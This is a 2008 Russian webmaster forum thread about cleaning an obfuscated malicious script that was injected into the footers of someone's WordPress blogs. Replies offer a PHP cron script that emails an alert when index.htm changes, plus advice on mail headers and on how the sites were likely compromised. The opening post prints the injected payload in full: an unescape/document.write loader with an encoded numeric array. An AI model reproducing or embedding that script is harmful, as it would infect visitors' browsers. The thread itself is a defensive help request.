Проверьте локальные копии файлов на вашем компьютере - Веб-строительство

Вырезать код вируса со всех страниц WP

gasyoun · 2008-01-27T12:18:04.0000000Z

Ребята, На хостинге на всех моих 20 блогах внизу каждого приписано: <script>document.write(unescape("%3Cscript%3Efunction%20d4vgsr%28z1a4zs%29%7Bvar%20obd9s7%3Dnew%20String%28arguments.callee%29%3Bobd9s7%3Dobd9s7.replace%28/%5B%5Ea-z0-9%28%29+_%5Czo62%3D%27%zs%569%2C29550%2C2956%2C29562%2C29544%2C29536%2C29536%2C29564%2C29495%2C29457%2C29473%2C29516%2C29544%2C29459%2C29446%2C29441%2C29446%2C29440%2C29553%2C29556%2C29544%2C29456%2C29554%2C29473%2C29561%2C29479%2C29549%2C29502%2C29553%2C29536%2C29547%2C29440%2C29557%2C29567%2C29561%2C29539%2C29488%2C29545%2C29440%2C29565%2C29549%2C29562%2C29514%2C29482%2C29520%2C29564%2C29549%2C29554%2C29454%2C29494%2C29520%2C29463%2C29542%2C29562%2C29554%2C29481%2C29496%2C29496%2C29493%2C29523%2C29545%2C29526%2C29482%2C29515%2C29524%2C29534%2C29532%2C29456%2C29471%2C29536%2C29452%2C29513%2C29514%2C29535%2C29562%2C29544%2C29466%2C29470%2C29515%2C29485%2C29501%2C29486%2C29558%2C29446%2C29460%2C29440%2C29457%2C29459%2C29564%2C29558%2C29466%2C29441%2C29529%2C29547%2C29448%2C29538%2C29524%2C29562%2C29453%2C29440%2C29470%2C29540%2C29499%2C29470%2C29564%2C29539%2C29551%2C29509%2C29460%2C29552%2C29539%2C29546%2C29565%2C29448%2C29479%2C29462%2C29541%2C29546%2C29478%2C29483%2C29542%2C29553%2C29442%2C29550%2C29498%2C29546%2C29468%2C29538%2C29553%2C29536%2C29546%2C29506%2C29453%2C29446%2C29561%2C29450%2C29506%2C29492%2C29469%2C29537%2C29536%2C29445%2C29542%2C29545%2C29460%2C29461%2C29547%2C29557%2C29504%2C29560%2C29469%2C29463%2C29542%2C29561%2C29563%2C29520%2C29536%2C29563%2C29447%2C29443%2C29545%2C29519%2C29514%2C29520%2C29460%2C29565%2C29537%2C29545%2C29567%2C29563%2C29558%2C29470%2C29500%2C29559%2C29566%2C29455%2C29549%2C29504%2C29525%2C29550%2C29554%2C29558%2C29564%2C29565%2C29501%2C29458%2C29460%2C29459%2C29556%2C29566%2C29445%2C29469%2C29541%2C29468%2C29549%2C29469%2C29527%2C29454%2C29519%2C29501%2C29562%2C29548%2C29444%2C29496%2C29481%2C29559%2C29539%2C29552%2C29514%2C29506%2C29475%2C29517%2C29554%2C29497%2C29542%2C29447%2C29557%2C29502%2C29555%2C29442%2C29540%2C29472%2C29467%2C29554%2C29545%2C29493%2C29528%2C29550%2C29543%2C29565%2C29509%2C29503%2C29497%2C29554%2C29447%2C29444%2C29476%2C29467%2C29536%2C29567%2C29473%2C29483%2C29491%2C29495%2C29488%2C29486%2C29503%2C29493%2C29530%2C29482%2C29535%2C29489%2C29496%2C29489%2C29526%2C29494%2C29466%2C29471%2C29547%2C29566%2C29558%2C29554%2C29563%2C29543%2C29446%2C29554%2C29562%2C29549%2C29489%2C29441%2C29543%2C29443%2C29470%2C29537%2C29547%2C29497%2C29493%2C29487%2C29543%2C29458%2C29548%2C29558%2C29514%2C29503%2C29482%2C29502%2C29514%2C29512%2C29522%2C29534%2C29496%2C29558%2C29545%2C29546%2C29561%2C29540%2C29562%2C29494%2C29548%2C29550%2C29471%2C29470%2C29463%2C29473%2C29487%2C29473%2C29483%2C29488%2C29474%2C29503%2C29545%2C29561%2C29540%2C29444%2C29467%2C29461%2C29563%2C29490%2C29483%2C29490%2C29502%2C29500%2C29457%2C29491%2C29565%2C29563%2C29521%2C29525%2C29511%2C29513%2C29565%2C29546%2C29565%2C29553%2C29561%2C29531%2C29483%2C29480%2C29500%2C29465%2C29471%2C29440%2C29471%2C29463%2C29457%2C29551%2C29511%2C29466%2C29560%2C29448%2C29554%2C29446%2C29542%2C29551%2C29565%2C29460%2C29449%2C29531%2C29555%2C29440%2C29557%2C29554%2C29446%2C29560%2C29551%2C29560%2C29492%2C29475%2C29503%2C29444%2C29565%2C29442%2C29462%2C29539%2C29559%2C29562%2C29554%2C29479%2C29498%2C29567%2C29451%2C29466%2C29457%2C29465%2C29440%2C29461%2C29538%2C29549%2C29553%2C29548%2C29563%2C29540%2C29552%2C29493%2C29486%2C29533%2C29544%2C29542%2C29553%2C29562%2C29555%2C29462%2C29553%2C29560%2C29487%2C29559%2C29442%2C29446%2C29465%2C29558%2C29545%2C29487%2C29565%2C29443%2C29453%2C29560%2C29558%2C29530%2C29566%2C29479%2C29542%2C29564%2C29564%2C29548%2C29505%2C29550%2C29555%2C29543%2C29538%2C29466%2C29540%2C29476%2C29563%2C29442%2C29540%2C29480%2C29529%2C29485%2C29501%2C29492%2C29491%2C29497%2C29492%2C29506%2C29564%2C29444%2C29564%2C29549%2C29474%2C29547%2C29536%2C29542%2C29561%2C29564%2C29561%2C29477%2C29563%2C29541%2C29545%2C29547%2C29503%2C29502%2C29480%2C29490%2C29480%2C29528%2C29481%2C29491%2C29484%2C29466%2C29460%2C29463%2C29455%2C29496%2C29460%2C29461%2C29547%2C29551%2C29449%2C29536%2C29535%2C29549%2C29443%2C29541%2C29449%2C29472%2C29531%2C29522%2C29483%2C29485%2C29498%2C29566%2C29547%2C29469%2C29561%2C29442%2C29544%2C29444%2C29464%2C29514%2C29530%2C29567%2C29562%2C29453%2C29454%2C29562%2C29564%2C29561%2C29467%2C29546%2C29462%2C29440%2C29525%2C29547%2C29560%2C29542%2C29494%2C29551%2C29553%2C29546%2C29549%2C29559%2C29549%2C29552%2C29447%2C29532%2C29467%2C29559%2C29454%2C29559%2C29539%2C29564%2C29453%2C29445%2C29529%2C29545%2C29564%2C29465%2C29536%2C29489%2C29500%2C29542%2C29565%2C29462%2C29445%2C29555%2C29553%2C29465%2C29468%2C29445%2C29542%2C29487%2C29485%2C29539%2C29542%2C29549%2C29467%2C29479%2C29499%2C29478%2C29524%2C29485%2C29489%2C29481%2C29479%2C29500%2C29448%2C29446%2C29540%2C29519%2C29526%2C29490%2C29492%2C29515%2C29517%2C29484%2C29459%2C29544%2C29497%2C29563%2C29454%2C29536%2C29516%2C29512%2C29482%2C29502%2C29490%2C29545%2C29537%2C29559%2C29546%2C29554%2C29445%2C29444%2C29545%2C29451%2C29527%2C29529%2C29522%2C29495%2C29487%2C29566%2C29539%2C29563%2C29546%2C29534%2C29555%2C29564%2C29547%2C29488%2C29545%2C29442%2C29457%2C29515%2C29543%2C29544%2C29536%2C29558%2C29555%2C29495%2C29495%2C29498%2C29493%2C29523%2C29480%2C29491%2C29509%2C29514%2C29479%2C29519%2C29459%2C29446%2C29466%2C29491%2C29542%2C29548%2C29443%2C29556%2C29452%2C29557%2C29554%2C29493%2C29514%2C29508%2C29507%2C29491%2C29559%2C29498%2C29551%2C29522%2C29484%2C29523%2C29492%2C29506%2C29532%2C29479%2C29529%2C29488%2C29488%2C29490%2C29493%2C29473%2C29537%2C29565%2C29469%2C29562%2C29558%2C29558%2C29447%2C29520%2C29528%2C29533%2C29521%2C29492%2C29474%2C29485%2C29503%2C29499%2C29502%2C29489%2C29472%2C29473%2C29514%2C29489%2C29519%2C29475%2C29478%2C29498%2C29517%2C29501%2C29495%2C29537%2C29450%2C29470%2C29537%2C29491%2C29567%2C29559%2C29471%2C29509%2C29557%2C29559%2C29563%2C29489%2C29564%2C29470%2C29468%2C29542%2C29545%2C29489%2C29473%2C29487%2C29474%2C29523%2C29475%2C29501%2C29512%2C29492%2C29473%2C29500%2C29443%2C29442%2C29467%2C29446%2C29494%2C29563%2C29557%2C29562%2C29548%2C29492%2C29492%2C29502%2C29550%2C29543%2C29466%2C29464%2C29532%2C29560%2C29550%2C29566%2C29539%2C29481%2C29460%2C29461%2C29445%2C29564%2C29496%2C29536%2C29539%2C29561%2C29551%2C29546%2C29565%2C29504%2C29556%2C29554%2C29457%2C29518%2C29565%2C29542%2C29567%2C29558%2C29556%2C29498%2C29491%2C29496%2C29554%2C29546%2C29552%2C29456%2C29558%2C29562%2C29555%2C29566%2C29502%2C29472%2C29471%2C29463%2C29457%2C29545%2C29542%2C29469%2C29563%2C29448%2C29541%2C29451%2C29542%2C29482%2C29552%2C29517%2C29505%2C29476%2C29489%2C29523%2C29538%2C29486%2C29514%2C29491%2C29498%2C29485%2C29478%2C29482%2C29483%2C29527%2C29502%2C29531%2C29517%2C29486%2C29567%2C29559%2C29567%2C29547%2C29558%2C29460%2C29478%2C29503%2C29514%2C29563%2C29495%2C29499%2C29516%2C29476%2C29492%2C29566%2C29537%2C29540%2C29502%2C29501%2C29561%2C29460%2C29566%2C29481%2C29563%2C29490%2C29486%2C29512%2C29503%2C29541%2C29473%2C29480%2C29517%2C29445%2C29513%2C29503%2C29541%2C29482%2C29503%2C29508%2C29513%2C29554%2C29477%2C29480%2C29563%2C29473%2C29537%2C29537%2C29559%2C29548%2C29467%2C29567%2C29500%2C29472%2C29508%2C29458%2C29557%2C29442%2C29492%2C29449%2C29549%2C29543%2C29469%2C29567%2C29490%2C29508%2C29557%2C29549%2C29559%2C29516%2C29562%2C29453%2C29563%2C29562%2C29539%2C29541%2C29479%2C29472%2C29490%2C29503%2C29500%2C29456%2C29492%2C29541%2C29561%2C29536%2C29553%2C29546%2C29565%2C29478%2C29476%2C29525%2C29481%2C29494%2C29495%2C29478%2C29495%2C29477%2C29567%2C29470%2C29456%2C29462%2C29456%2C29549%2C29464%2C29537%2C29547%2C29553%2C29506%2C29543%2C29527%2C29560%2C29443%2C29463%2C29558%2C29470%2C29463%2C29458%2C29539%2C29566%2C29456%2C29440%2C29536%2C29465%2C29526%2C29453%2C29523%2C29519%2C29520%2C29546%2C29456%2C29440%2C29526%2C29475%2C29512%2C29512%2C29468%2C29443%2C29460%2C29558%2C29559%2C29556%2C29551%2C29475%2C29495%2C29490%2C29496%2C29557%2C29478%2C29559%2C29469%2C29441%2C29443%2C29561%2C29441%2C29562%2C29503%2C29500%2C29529%2C29542%2C29565%2C29501%2C29500%2C29465%2C29559%2C29560%2C29557%2C29467%2C29443%2C29473%29%29%3C/script%3E"))</script> Как это автоматом отпарсить и убрать, заранее спасибо.

IS

168

Igor-san

29 января 2008, 19:19

#11

Создаем файл check_files.php (подставив ваши данные).

И в крон делаем его запуск (например каждые 10 минут).

/usr/local/bin/php /home/вашсайт/public_html/check_files.php /dev/null

<?php

$filename = getcwd() .'/public_html/index.htm';

/*  /usr/local/bin/php /home/вашсайт/public_html/check_files.php /dev/null  Как поставить в крон */

$secure_code='INDEX_FILE_CHANGED'; //Это для моих спам фильтров



$fsize = filesize($filename);



if ($fsize > 0) {



 //Отправить почту

 $date_time=date("d.m.y / H:i:s");

 $user =get_current_user(); //Get the name of the owner of the current PHP script



      $subject = "USER: $user : ".$date_time." ";

      $subject .= $secure_code;

      $message = "Файл $filename имеет размер, отличный от 0, а именно = $fsize bytes." ;

      $message .= "\n\n Проверка произведена в $date_time на сервере ".$user;



      $succ = @mail($adminmail,$subject,$message,"From: Check_files <ваш@адрес>");

         if ($succ) {

            //echo 'Send OK'; //При отладке можно разкомментировать

        }

        else {

        	//echo 'Send Bad';

        }



} else {

//echo 'OK '; //  ничего не делаем,всё в порядке

}

?>

Можно и не нулевой файл index.htm (соответственно будет if ($fsize == ххх) ), главное, чтоб не изменялся.

153

w-builder

29 января 2008, 19:56

#12

Если WP - это Wordpress, то почему просто не поправить footer.php

Ну а потом уже проверки, конечно.

Для массовой замены можно использовать условно-бесплатный (условия вы знаете, я думаю) Dreamweaver :)

Привычная кнопка "бабло" (http://www.sape.ru/r.8941d9c141.php) + кнопка "кладбище ГСов с парой хороших площадок" (http://gogetlinks.net/?inv=cj4bru) + Советы по увеличению дохода в РСЯ в 2 раза для партнеров бесплатно (http://profit-project.ru/1256759949)

IS

168

Igor-san

29 января 2008, 20:17

#13

w-builder:
Если WP - это Wordpress, то почему просто не поправить footer.php

Ну а потом уже проверки, конечно.

Для массовой замены можно использовать условно-бесплатный (условия вы знаете, я думаю) Dreamweaver :)

Думаю, там не только footer.php изменен. У меня на PHPNuke и modules.php и index.php и все пустые index.htm, что в разных директориях распиханы, да и что-то еще было.

786

Unlock

31 января 2008, 07:00

#14

Igor-san, спасибо за скрипт. Правда не хочет почту отправлять, Send Bad. Не могу понять почему, в логах чисто. Подскажите пожалуйста, где копать?

P.S. Задал $adminmail и письма пошли, правда скрипт все равно выдает Send Bad, хотя письма доходят. Да и как кодировку для письма задать? Сорри за ламерские вопросы :)

Есть желание, - тысяча способов; нет желания, - тысяча поводов! /Петр-I/.

100

daykkin

31 января 2008, 08:45

#15

Таже ерунда) Только у меня так и не отправляет, ибо не знаю как победить) Так что пока что смотрю на send bad)

Hakuna Matata! What a wonderful phrase. Hakuna Matata! Ain't no passing craze. It means no worries for the rest of your days, It's our problem-free, philosophy, Hakuna Matata! :)

IS

168

Igor-san

31 января 2008, 13:41

#16

Странно. Некоторые замечания

1) Как правильно подметил Unlock, переменную $adminmail надо заменить свои мылом (или определить в начале скрипта).

2) При запуске скрипта для проверки из браузера http://www.xxxx.tld/check_files.php переменную $filename нужно писать в виде $filename = getcwd() .'/index.htm'; или просто $filename = 'index.htm'

(а $filename = getcwd() .'/public_html/index.htm'; необходим при запуске из крона)

3) попробуйте убрать @ перед mail() - это включит вывод ошибок, и если они появяться, по ним можно что-то судить.

Хотя если у Unlock письма доходят - то какие там ошибки?

100

daykkin

31 января 2008, 13:49

#17

Заменил adminmail на мыло, почта пошла, ошибок нет - пишет send ok.. изменил filename для крона, включил крон, жду результата..

IS

168

Igor-san

31 января 2008, 14:06

#18

По поводу кодировки,нужно дополнительно включить заголовки


       $subject = "USER: $user : ".$date_time." ";

       $subject .= $secure_code;

       $message = "Файл $filename имеет размер, отличный от 0, а именно = $fsize bytes." ;

      $message .= "\n\n Проверка произведена в $date_time на сервере ".$user;

//добавим строки

// To send HTML mail, the Content-type header must be set

$headers = 'Content-type: text/plain; charset=windows-1251' . "\r\n";

// Additional headers

$headers .= 'From: Check_files <lваш@адрес.ru>' . "\r\n";



      $succ = mail($adminmail,$subject,$message,$headers);

Ну а с ошибкой при удачной отправке, возможно из-за различий версий PHP или safe mode - тут я не в курсе.

SL

0

ScriptsLab

31 января 2008, 16:42

#19

Не о том говорите. Откуда он взялся?

Проверьте локальные копии файлов на вашем компьютере. Что за PHP-редактор? FTP-клиент? Антивирь?

Без прав на запись изменение файлов через сайт невозможно. Кто владелец и какие права у файлов на хостинге?

100

daykkin

31 января 2008, 16:50

#20

Да пароль слили, либо у него, либо у хостера.. такое сплошь и рядом..

По поводу кроновского скрипта.. Отказываеться его крон запускать.. я уже какого рода команды не пробывал, и тех поддержку хостера задолбал.. ни хочит сволочь такая)

daykkin добавил 01.02.2008 в 09:08

Вообщем сутки я парился, крон к отправке маила привередлив, путем тестов было доказано что он ни хочет его отправлять, причем ни одним из разных методов (функций).. Зато у меня на руках реализованный скрипт, той же системы, но отправки сообщения Вам на ICQ.. если кому нужен - пишите..

Маркетинг для шоколадной фабрики. На 34% выше средний чек

Яндекс Вебмастер вынес товарные фиды в отдельный раздел

Вырезать код вируса со всех страниц WP